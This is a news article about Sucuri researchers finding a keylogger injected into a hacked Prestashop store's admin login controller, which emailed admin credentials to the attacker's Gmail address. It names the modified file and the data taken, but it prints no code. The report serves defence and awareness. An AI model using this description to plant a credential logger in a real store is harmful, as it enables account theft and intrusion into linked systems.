14 DAY TRIAL // There's a new brand of web malware going around, according to Sucuri security experts, who say this sneaky threat is designed to log admin credentials for e-commerce stores.
Currently targeting only Prestashop installations, this new threat was found on a hacked store by Sucuri researcher Conrado Torquato.
The researcher says the attacker gained access to the server and modified the "./controllers/admin/AdminLoginController.php" file to include a keylogger.
Malicious PHP code injected in Prestashop login page
This particular PHP file is responsible for loading the admin panel login page. The extra code the attacker added collected the text admins entered in the login form and sent it via email to the attacker's inbox.
Torquato says the attacker collected the site's domain, the login page's URL, and the admin's credentials (in cleartext).
"The email includes everything the attacker needs to log into the hacked Prestashop site," Torquato explained.
Attacker logged admin credentials despite already hacking the server
What Torquato didn't explain is why an attacker would need admin credentials when he already compromised the site and had edited its source code. The attacker clearly had access to everything he needed, and he could have easily created his own admin account.
A possible reason might be that some stores are just the public face of a much larger company. An attacker is hoping that some shop admins reused their Prestashop credentials for other internal systems such as Intranets, CRMs, HRMs, VPS servers, firewalls, and others, which might grant the hacker access to systems storing other sensitive information he could steal.
The Sucuri researcher says that, at the time of his investigation, the Gmail address where credentials were sent via email had been removed, most likely by Google, following an abuse report.
You generally don't see credential stealers on online stores that often. In most cases, security experts find malicious code that collects payment card details via checkout forms.